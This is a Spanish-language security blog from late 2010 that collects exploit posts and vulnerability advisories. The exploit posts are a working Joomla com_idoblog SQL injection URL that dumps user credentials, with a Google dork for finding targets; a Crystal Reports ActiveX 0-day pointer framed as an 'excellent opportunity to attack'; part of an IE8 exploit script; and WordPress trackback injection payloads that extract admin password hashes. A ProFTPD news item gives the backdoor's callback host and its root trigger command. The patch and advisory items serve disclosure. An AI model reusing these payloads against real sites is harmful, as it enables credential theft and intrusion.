domingo, 26 de diciembre de 2010

Joomla Component (com_idoblog) SQL Injection Vulnerability

# Exploit Title: joomla com_idoblog /SQL injection Vulnerability
# Google Dork: inurl:"com_idoblog"
# Date: 25/12/2010
# Author: NOCKAR1111
# Location:Algeria
# AuthorEmail:nockar1111@hotmail.com
# Language: php
# Tested on: windows xp sp3 en
# http://extensions.joomla.org/extensions/news-production/blog/9218

#Exploit:http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,2,concat%28username,0x3a,password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--

____________________________________________
Greetz:Lagripe-dz,BrOx-Dz,Mr NoRvI,indoushka
and dz4all members

Crystal Reports Viewer 12.0.0.549 Activex Exploit (PrintControl.dll) 0-day

Excelente oportunidad para atacar,
Crystal Reports Viewer 12.0.0.549 Activex Exploit (PrintControl.dll) 0-day
By = Dr_IDE
File = "C:\Program Files\BusinessObjects\Common\4.0\crystalreportviewers12\ActiveXControls\PrintControl.dll"
method = "ServerResourceVersion"
progid = "CrystalPrintControlLib.CrystalPrintControl"
Site = http://www.sap.com
Tested On = Windows XPSP3 VM with IE 7.0.5730.13
Notes = In my testing it was not 100% reliable.
Url del exploit = http://www.exploit-db.com/exploits/15733/

Ejecución arbitraria de comandos en Citrix Access Gateway

Se ha encontrado un fallo en los módulos de autenticación NT4 y NTLM de Citrix Access Gateway que podría permitir a un atacante ejecutar comandos arbitrarios en el servidor.

Citrix Access Gateway es un popular dispositivo para realizar VPN sobre SSL e IPSec.

El problema tiene su origen en que no se filtra adecuadamente la contraseña enviada al servidor. Los valores enviados son directamente introducidos en una línea de comando y, por tanto, un atacante podría ejecutar cualquier comando sobre el servidor mediante un valor especialmente manipulado de la contraseña en los módulos de autenticación NT4 o NTLM.

Ha sido publicado una prueba de concepto y asignado el CVE "CVE-2010-4566". Citrix fue avisada del problema el pasado mes de agosto.

Esta vulnerabilidad afecta a todas las versiones "Enterprise" inferiores a 9.2-49.8 y todas las versiones "Standard" y "Advanced" inferiores a 5.0.



Más Información:

Original Advisory:
http://www.vsecurity.com/resources/advisory/20101221-1/

Citrix Security Bulletin:
http://support.citrix.com/article/CTX127613

Ejecución remota de código en HP StorageWorks Storage Mirroring

Ejecución remota de código en HP StorageWorks Storage Mirroring

HP ha confirmado la existencia de una vulbnerabilidad en HP StorageWorks Storage Mirroring (versiones anteriores a 5.2.2.1771.2), que podrían permitir a un atacante remoto comprometer los sistemas afectados.

El software HP StorageWorks Storage Mirroring se ha diseñado para recuperar aplicaciones, servidores, datos y almacenamiento con la misma interfaz de fácil uso. Storage Mirroring compara los datos y envía sólo aquéllos que han cambiado.
El problema del que no se han facilitado detalles se ha reportado a través de TippingPoint ZDI, y podría permitir a un atacante remoto lograr la ejecución de código arbitrario en los sistemas vulnerables.

HP ha publicado la actualización 5.2.2.1771.2 disponible a través del canal de soporte de HP Services.



Opina sobre esta noticia:
http://www.hispasec.com/unaaldia/4442/comentar

Más Información:

HPSBST02619 SSRT100281 rev.2 - HP StorageWorks Storage Mirroring, Remote Execution of Arbitrary Code
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02660122

Desbordamiento de memoria intermedia a través del servicio FTP en IIS 7.x

El investigador Matthew Bergin ha descubierto una vulnerabilidad en el servicio FTP integrado en la versión 7.5 de IIS en Windows 7. Ha hecho públicos todos los detalles del fallo y el código necesario para aprovecharlo.

El fallo se debe a un desbordamiento de memoria intermedia en la función 'OnSendData'. Este fallo podría ser aprovechado por un atacante remoto (sin necesidad de poseer usuario en ese FTP) para causar una denegación de servicio a través de peticiones de usuario especialmente manipuladas. Al tratarse de un desbordamiento de memoria intermedia podría llegar a permitir la ejecución de código arbitrario, pero de momento, no ha sido demostrado que pueda ser explotado con dicho fin.

Microsoft engloba dentro del "paquete" IIS, entre otros, al conocido servidor web IIS y un servidor FTP que no se instala por defecto. La versión 7.5 de IIS se encuentra disponible para Windows 2008 y Windows 7. Estrictamente hablando, no se trata de un 0 day, puesto que el fallo no ha sido detectado en ataques reales a sistemas. No se tiene constancia de que esté siendo aprovechado para vulnerar servidores.

No es la primera vez que el servicio FTP de IIS es vulnerado "por sorpresa". El 31 de agosto del 2009, Kingcope publicó también sin previo aviso, un exploit que permitía a un atacante remoto ejecutar código con permisos de SYSTEM en un servidor IIS 5.x. Este caso resultaba mucho más grave, aunque se limitaba a una versión relativamente antigua y bajo condiciones concretas (WebDAV).



Más Información:

Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS PoC
http://www.exploit-db.com/exploits/15803/

Internet Explorer 8 CSS Parser Exploit

#!/usr/bin/env ruby

# Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/
# Author: Nephi Johnson (d0c_s4vage)


require 'socket'

def http_send(sock, data, opts={})
defaults = {:code=>"200", :message=>"OK", :type=>"text/html"}
opts = defaults.merge(opts)

code = opts[:code]
message = opts[:message]
type = opts[:type]

to_send = "HTTP/1.1 #{code} #{message}\r\n" +
"Date: Sat, 11 Dec 2010 14:20:23 GMT\r\n" +
"Cache-Control: no-cache\r\n" +
"Content-Type: #{type}\r\n" +
"Pragma: no-cache\r\n" +
"Content-Length: #{data.length}\r\n\r\n" +
"#{data}"
puts "[+] Sending:"
to_send.split("\n").each do |line|
puts " #{line}"
end
sock.write(to_send) rescue return false
return true
end

... Ver el código completo del exploit

lunes, 20 de diciembre de 2010

Elevación de privilegios a través de ACPI en kernel Linux 2.6.x, calificada de "locura"

Dave Jones ha descubierto un fallo en los permisos del fichero '/sys/kernel/debug/acpi/custom_method' que podría permitir a un usuario local llevar a cabo una elevación de privilegios a través de la modificación de las llamadas a métodos ACPI. El propio descubridor ha calificado de "locura" los permisos asignados a ese archivo.

ACPI es un estándar que controla el funcionamiento del BIOS y proporciona mecanismos avanzados para la gestión y ahorro de la energía convirtiendo, por ejemplo, la pulsación del botón de apagado en un simple evento. Así, el sistema operativo puede detectarlo y permitir efectuar un apagado ordenado de la máquina, sin riesgo para el hardware (como ocurría anteriormente).

El fallo se da en que el archivo

/sys/kernel/debug/acpi/custom_method

actualmente tiene permisos de escritura para todos los usuarios del equipo, independientemente de sus permisos. Esto permitiría que elevaran privilegios a root de forma sencilla. El propio descubridor escribe en una nota del GIT.

"Currently we have:

--w--w--w-. 1 root root 0 2010-11-11 14:56
/sys/kernel/debug/acpi/custom_method

which is just crazy. Change this to --w-------."

Para corregir el fallo basta con cambiar los permisos del fichero habilitando exclusivamente la escritura para el usuario root.

El fallo ha sido corregido en el repositorio de código del kernel y su CVE asignado es CVE-2010-4347.


Más Información:

CVE-2010-4347 kernel: local privilege escalation via
/sys/kernel/debug/acpi/custom_method
https://bugzilla.redhat.com/show_bug.cgi?id=663542

ACPI: debugfs custom_method open to non-root
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;h=ed3aada1bf34c5a9e98af167f125f8a740fc726a

Advanced Configuration and Power Interface (ACPI)
http://es.wikipedia.org/wiki/Advanced_Configuration_and_Power_Interface

martes, 7 de diciembre de 2010

Publicada la versión 5.6 de Winamp

Nullsoft ha publicado la versión 5.6 de su reproductor Winamp, que corrige varios errores de seguridad.

Winamp es un reproductor multimedia gratuito muy extendido entre los usuarios de la plataforma Windows, por su popularidad, uso de pocos recursos para el sistema y por su fácil y sencilla interfaz gráfica, permitiendo personalizar ésta última.

El NIST (National Institute of Standards and Tecnology) ha asignado los siguientes CVEs a las vulnerabilidades que se describen a continuación.

CVE-2010-2586: Existen varios errores en el plugin 'in_nsv' que podría causar un desbordamiento de entero y permitir a un atacante remoto ejecutar código arbitrario a través de una tabla de contenidos (TOC) o de un búfer SNV especialmente manipulado.

CVE-2010-4370: Existen varios errores en el plugin 'in_midi' que podría causar un desbordamiento de entero y permitir a un atacante remoto tomar el control de la máquina a través de un fichero MIDI especialmente manipulado.

CVE-2010-4371: Existe un error en el plugin 'in_mod' que podría causar un desbordamiento de memoria intermedia y que permitiría tomar el control de la máquina a través de vectores relacionados con cajas de comentarios.

CVE-2010-4372: Existe un error en el plugin 'in_nsv' que podría permitir a un atacante remoto tomar el control de la máquina a través de unos metadatos NSV especialmente manipulados. Esta vulnerabilidad es distinta a CVE-2010-2586.

CVE-2010-4373: Existe un error en el plugin 'in_mp4' que podría permitir a un atacante remoto causar una denegación de servicio a través de un fichero MP4 especialmente manipulado.

CVE-2010-4374: Existe un error el plugin 'in_mkv' que podría permitir a un atacante remoto causar una denegación de servicio a través de un fichero MKV (Matroska Video) especialmente manipulado.

Se recomienda a los usuarios que utilicen Winamp actualizar a la versión 5.6 desde su página oficial http://www.winamp.com



Más Información:

Página oficial
http://forums.winamp.com/showthread.php?t=324322

domingo, 5 de diciembre de 2010

SQL injection vulnerability in do_trackbacks() Wordpress function

Description: SQL injection vulnerability in do_trackbacks() function of WordPress allows remote attackers to execute arbitrary SELECT SQL query.
Access Vector: Network
Attack Complexity: Medium
Authentication: Single Instance
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None

UPDATE Dec 1, 2010: This vulnerability was first discovered by M4g and is described in this
article.

The do_trackbacks() function in wp-includes/comment.php does not properly escape the input that
comes from the user, allowing a remote user with publish_posts and edit_published_posts
capabilities to execute an arbitrary SELECT SQL query, which can lead to disclosure of any
information stored in the WordPress database.

function do_trackbacks($post_id) {
global $wpdb;

$post = $wpdb->get_row( $wpdb->prepare("SELECT * FROM $wpdb->posts WHERE ID = %d", $post_id) );
$to_ping = get_to_ping($post_id);
$pinged = get_pung($post_id);
if ( empty($to_ping) ) {
$wpdb->update($wpdb->posts, array('to_ping' => ''), array('ID' => $post_id) );
return;
}

if ( empty($post->post_excerpt) )
$excerpt = apply_filters('the_content', $post->post_content);
else
$excerpt = apply_filters('the_excerpt', $post->post_excerpt);
$excerpt = str_replace(']]>', ']]>', $excerpt);
$excerpt = wp_html_excerpt($excerpt, 252) . '...';

$post_title = apply_filters('the_title', $post->post_title);
$post_title = strip_tags($post_title);

if ( $to_ping ) {
foreach ( (array) $to_ping as $tb_ping ) {
$tb_ping = trim($tb_ping);
if ( !in_array($tb_ping, $pinged) ) {
trackback($tb_ping, $post_title, $excerpt, $post_id);
$pinged[] = $tb_ping;
} else {
$wpdb->query( $wpdb->prepare("UPDATE $wpdb->posts SET to_ping = TRIM(REPLACE(to_ping, '$tb_ping', '')) WHERE ID = %d", $post_id) );
}
}
}
}

The $tb_ping variable is passed to the query in line 1657 unescaped.

Exploitation. The logged in user must have publish_posts and edit_published_posts capabilities
(this corresponds to the Author role).

First, the user creates a new post (title/content does not matter); text to put into the “Send Trackbacks” field is:

AAA’,”)),post_title=(select/**/concat(user_login,’|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,’

and publishes it. He needs to wait a bit — for wp-cron.php to process the trackback. The get_to_ping() function says that this trackback is to be processed:

AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'

Then the user goes back and edits the post.

Now the user duplicates the text in the “Send Trackbacks” field and updates the post:

AAA’,”)),post_title=(select/**/concat(user_login,’|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,’

AAA’,”)),post_title=(select/**/concat(user_login,’|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,’

The get_to_ping() function says that these trackbacks are to be processed:

AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'

AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'

Query logging shows that WordPress executes this query (reformatted for the sake of readbility):

UPDATE wp_posts
SET to_ping = TRIM(REPLACE(to_ping, 'AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'', ''))
WHERE ID = 11

After that when the user refreshes the page (he may need to wait a bit for wp-cron.php to complete), the admin information is shown in the input box.

Likewise, any information (login salt, nonce salt, email addresses etc) can be disclosed.
The screenshots above are for WordPress 3.0.1 but the vulnerability seems to exist since 2.x branch.

Likewise, any information (login salt, nonce salt, email addresses etc) can be disclosed.
The examples above are for WordPress 3.0.1 but the vulnerability seems to exist since 2.x branch.

Patch: below is the patch against WordPress 3.1 rev. 16609 that fixes the vulnerability:

Index: wp-includes/comment.php
===================================================================
--- wp-includes/comment.php (revision 16609)
+++ wp-includes/comment.php (working copy)
@@ -1723,7 +1723,7 @@
trackback($tb_ping, $post_title, $excerpt, $post_id);
$pinged[] = $tb_ping;
} else {
- $wpdb->query( $wpdb->prepare("UPDATE $wpdb->posts SET to_ping = TRIM(REPLACE(to_ping, '$tb_ping', '')) WHERE ID = %d", $post_id) );
+ $wpdb->query( $wpdb->prepare("UPDATE $wpdb->posts SET to_ping = TRIM(REPLACE(to_ping, %s, '')) WHERE ID = %d", $tb_ping, $post_id) );
}
}
}


Proyecto ProFTPD comprometido y servidor troyanizado

Este pasado domingo 28 de noviembre el servidor principal de distribución de ficheros del proyecto ProFTPD se ha visto comprometido y la versión 1.3.3c reemplazada por otra con una puerta trasera.

ProFTP es un popular servidor FTP promocionado como estable y seguro, ampliamente configurable y de diseño modular, permitiendo de esta forma escribir extensiones como cifrado SSL/TLS, RADIUS, LDAP o SQL.

Según parece, el atacante empleó para acceder al servidor una vulnerabilidad no corregida en el propio demonio FTP. De esta forma pudo reemplazar los ficheros fuente para la versión ProFTPD 1.3.3c con una versión modificada conteniendo una puerta trasera.

Todavía no está claro qué vulnerabilidad usaron los atacantes para acceder. Si fuera un fallo conocido, esto indicaría que ProFTPD no ha parcheado sus propios servidores a tiempo, dando un pésimo ejemplo. Si fuera desconocida y solo la pudiesen utilizar los atacantes, no tendrían necesidad de troyanizar la distribución central de ProFTPD, puesto que ese fallo ya les permitiría de por sí tener acceso a los servidores. Habrá que esperar aclaraciones.

La modificación no autorizada del código fuente fue advertida por Jeroen Geilman el miércoles 1 de diciembre y solucionada posteriormente.

El servidor actúa como site principal para el proyecto ProFTPD así como servidor de distribución rsync para todos los servidores espejo. Esto implica que cualquier persona que se haya descargado la versión ProFTPD 1.3.3c de uno de los espejos oficiales entre los días 28 de noviembre y 1 de diciembre están afectados por este problema.

La puerta trasera introducida por los atacantes permiten acceso remoto con permisos de root a usuarios no autenticados en los sistemas que estén ejecutando la versión modificada del demonio ProFTPD dándole al atacante control total sobre el sistema.

El atacante ha realizado dos cambios en el programa. En primer lugar, el ProFTPD troyanizado se pone en contacto con la dirección IP 212.26.42.47 en el puerto 9090, y realiza una petición

GET /AB HTTP/1.0

Con esta petición en los logs, el atacante ya sabe qué máquina ha usado su ProFTPD troyanizado y dónde acudir. En segundo lugar, el atacante se conecta a ese servidor por FTP y escribe:

HELP ACIDBITCHEZ

Lo que le dará acceso root. La palabra ACIDBITCHEZ ha sido arbitrariamente elegida por el atacante.

Se recomienda a los usuarios que estén ejecutando dicha versión que comprueben si sus sistemas se han visto comprometidos y compilen o ejecuten una versión actualizada del código.

Para verificar la integridad de los ficheros fuente, se recomienda el uso de las firmas GPG disponibles tanto en los diferentes servidores FTP así como en la página oficial del proyecto ProFTPD:

http://www.proftpd.org/md5_pgp.html

Hash MD5:

018e0eb1757d9cea2a0e17f2c9b1ca2d proftpd-1.3.2e.tar.bz2
4ecb82cb1050c0e897d5343f6d2cc1ed proftpd-1.3.2e.tar.gz
8571bd78874b557e98480ed48e2df1d2 proftpd-1.3.3c.tar.bz2
4f2c554d6273b8145095837913ba9e5d proftpd-1.3.3c.tar.gz

Firmas PGP:

proftpd-1.3.2e.tar.bz2.asc
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAkuFYtsACgkQt46JP6URl2rqVACgzefr58XHVoh2ARERbkW5qPzb
Qj4AoOwwH55FlS7OM8sBjELT0OhrN0jQ
=E6hR
-----END PGP SIGNATURE-----

proftpd-1.3.2e.tar.gz.asc
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAkuFYuAACgkQt46JP6URl2pTVQCeJ7HM7ltLwJwb4TQ3AwT9j36n
/ywAn3rB6HRVDGTF2WuOJgn/dss7VWeV
=G553
-----END PGP SIGNATURE-----

proftpd-1.3.3c.tar.bz2.asc
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAkzLAWYACgkQt46JP6URl2qu3QCcDGXD+fRPOdKMp8fHyHI5d12E
83gAoPHBrjTFCz4MKYLhH8qqxmGslR2k
=aLli
-----END PGP SIGNATURE-----

proftpd-1.3.3c.tar.gz.asc
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAkzLAW0ACgkQt46JP6URl2ojfQCfXy/hWE8G5mhdhdLpaPUZsofK
pO8Anj+uP0hQcn1E/CEUddI0mezlSCmg
=e8el
-----END PGP SIGNATURE-----


Más Información:

ProFTPD ftp.proftpd.org compromise
http://sourceforge.net/mailarchive/message.php?msg_name=alpine.DEB.2.00.1012011542220.12930%40familiar.castaglia.org

extracto original de: hispasec.com

Cuidado con los resultados de los buscadores en Navidad

Hoy en día no es extraño que los usuarios adquieran los regalos navideños directamente a través de Internet. Este hecho no pasa desapercibido entre los propagadores de malware o estafadores, que a través de técnicas de envenenamiento SEO (Search engine optimization) o black SEO encuentran una forma eficaz de promocionar tiendas fraudulentas con el único fin de robar credenciales de pago por Internet. Websense ha publicado un informe analizando estas amenazas.

Las técnicas de "search engine optimization" u optimización de los resultados de búsqueda son conocidas desde que nacieron los buscadores. Aparecer entre las primeras posiciones en una búsqueda multiplica sustancialmente las posibilidades de que el usuario visite la página y por tanto, obtener un beneficio bien sea como anunciante o como proveedor. Cuando esta optimización se realiza sin escrúpulos, con malas artes y a costa de comprometer recursos ajenos, se convierte en Black SEO. Una técnica conocida, por ejemplo, es aprovechar vulnerabilidades en webs legítimas (como fallos XSS), que son utilizados para redirigir el tráfico hacia la web fraudulenta. Otra técnica muy usada es la inundación de foros y redes sociales con mensajes insustanciales promocionando la página en cuestión.

Estas técnicas son muy usadas por creadores de malware. En Navidad, además, aparecen tiendas fraudulentas que prometen importantes ofertas.

Los buscadores luchan para mitigar estos resultados engañosos en sus búsquedas, pero según publica Websense en un informe en el que se analizan las amenazas de 2010, aún están lejos de conseguirlo. El informe afirma que el 30% de los resultados mostrados por los buscadores para términos relacionados con las compras por Internet son fraudulentos. En Navidad, este porcentaje se acentúa.

Aunque el spam o correo basura sigue siendo el método principal usado por el atacante para incitar que las víctimas visiten sus páginas, las redes sociales se han convertido cada vez más en un medio utilizado para el fraude. En el mismo informe se afirma que el 10% de los campos "estado" de los usuarios de redes sociales que contienen enlaces son links a páginas fraudulentas.

Se aconseja que, no solo durante Navidad, se realicen las compras exclusivamente en tiendas reputadas.


Más Información:

Informe Websense
http://www.websense.com/content/threat-report-2010-introduction.aspx

extracto original de: hispasec.com

Actualización de php para Red Hat Enterprise Linux 4 y 5

Red Hat ha publicado una actualización de php que corrige múltiples fallos de seguridad. Estos errores podrían permitir a un atacante remoto causar ataques de cross-site scripting, inyección de parámetros o causar una denegación de servicio entre otros.

php es un popular lenguaje dinámico usado principalmente para programación web.

Los fallos corregidos, por orden de CVE, son los siguientes:

CVE-2009-5016 y CVE-2010-3870: Existe un error de truncamiento y falta de validación en la función 'utf8_decode' cuando decodifica secuencias multi-byte. Esto podría ser usado por un atacante remoto para causar ataques de cross-site scripting a través de una página web especialmente manipulada.

CVE-2010-0397: Existe un error al manejar los argumentos de la función 'xmlrpc_decode_request' de la extensión 'xmlrpc' que podría provocar una dereferencia de puntero nulo. Esto podría ser aprovechado por un atacante independiente de contexto para causar una denegación de servicio a través de una llamada a 'xmlrpc_decode_request' especialmente manipulada.

CVE-2010-1128: Existe un error no especificado en 'session extension' ue podría permitir a un atacante remoto eludir restricciones (open_basedir y safe_mode) a través de vectores no especificados.

CVE-2010-1917: Existe un desbordamiento de memoria intermedia basado en pila en la función fnmatch. Esto podría ser aprovechado por un atacante remoto para causar una denegación de servicio a través de la manipulación del primer argumento de la función fnmatch.

CVE-2010-2531: Existe un error no especifcado en var_export que podría permitir una fuga de datos en memoria.

CVE-2010-3065: Existe un error en el serializador por defecto de PHP al manejar incorrectamente el carácter PS_UNDEF_MARKER. Esto podría permitir a un atacante remoto inyectar código arbitrario a través de un inicio de sesión manipulando la petición POST.

Esta actualización está disponible a través de Red Hat Network.

extracto original de: hispasec.com

miércoles, 1 de diciembre de 2010

Vídeo: ¿Vuelve el ransomware? Troyano utiliza criptografía asimétrica (I)

El ransomware es un tipo de troyano que, de vez en cuando, asoma al mundo del malware. Esta semana hemos visto un espécimen que nos ha llamado la atención porque utiliza criptografía asimétrica para cifrar los archivos del usuario y pedir así un rescate por ellos. La mala noticia es que, al contrario que otros ransomware, este está relativamente bien hecho y los archivos pueden quedar inservibles. La buena noticia es que el atacante ha cometido un par de fallos y el impacto se puede mitigar.

Su funcionalidad básica es cifrar documentos y archivos del usuario y pedir un rescate por ellos (en este caso 120 dólares). Normalmente los atacantes utilizan una cuenta de PayPal o cualquier servicio de giro postal que facilite el anonimato. La mayoría ni se molestan, una vez recibido el dinero, en descifrar los archivos. Juegan con la desesperación de las víctimas, que pueden ver como todas las fotografías, documentos, presentaciones y vídeos de su disco duro quedan inservibles.

Uno de los más famosos fue PGPcoder, que saltó a la luz en 2004. Este troyano cifraba los archivos de los sistemas y solicitaba dinero a los usuarios afectados si querían volver a restaurarlos. La realidad es que, debido a un mal diseño de su creador, el troyano utilizaba un algoritmo de cifrado muy simple basado en valores fijos, que permitía invertirlo y recuperar automáticamente los archivos. Cada cierto tiempo el creador ha publicado una nueva versión y si bien comenzó a utilizar criptografía fuerte, no era asimétrica. Kaspersky consiguió crackear la contraseña usada y ofrecía soluciones a las víctimas para descifrar los archivos sin necesidad de pagar el rescate.

Pero parece que los atacantes han aprendido la lección. Este troyano utiliza una combinación de RSA (para generar un par de claves pública y privada) y AES para cifrar. A su vez, utiliza la clave pública del atacante para cifrar la privada con la que han sido cifrados los ficheros de la víctima. Además también evitan borrar los ficheros originales. Ahora los sobrescribe. En versiones anteriores, era posible recuperar los datos cifrados con cualquier programa para recuperar ficheros eliminados del sistema.

Pero aun así, el atacante comete algún que otro error. Lo analizamos en profundidad en la siguiente entrega.

Invitamos al lector a visualizar el vídeo alojado en YouTube (2:27 minutos)



Más Información:

una-al-dia (01/06/2005) El talón de Aquiles de PGPcoder, el troyano chantajista
http://www.hispasec.com/unaaldia/2412

una-al-dia (08/06/2005) Descifrado del troyano PGPcoder
http://www.hispasec.com/unaaldia/2419

Extracto original de: hispasec.com


Etiquetas

INTERNET (459) newsweek (305) SEGURIDAD (224) software (136) HACK (86) GOOGLE (47) Hacker (46) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) facebook (29) video (28) DESCARGA (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) gmail (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) ataques (3) hosting (3) hotmail (3) Guru (2) ajax (2) wpa2 (2)